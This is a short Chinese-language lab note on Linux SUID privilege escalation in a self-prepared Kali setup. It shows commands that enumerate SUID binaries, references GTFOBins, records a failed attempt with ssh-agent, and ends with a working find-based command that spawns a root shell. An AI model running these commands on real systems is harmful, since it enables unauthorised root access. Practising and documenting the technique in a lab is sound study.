过程

查询具备suid权限的二进制可执行文件
通过https://gtfobins.github.io/ 去搜索,相关的suid提权命令
最后执行命令,提权成功

开始这里还是kali权限


root权限进入/bin目录,给find命令增加suid权限chmod +s find

使用find命令查询具备suid的可执行二进制文件

find ./ -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

查看suid提权命令的网站https://gtfobins.github.io/

这里write的可执行文件没有提权命令

而ssh-agent有,试一下
./ssh-agent /bin/ -p

但发现还是需要密码才能成功,所以说这个还是不成的

发现find命令

使用find进行提权

./find . -exec /bin/sh -p \; -quit


成功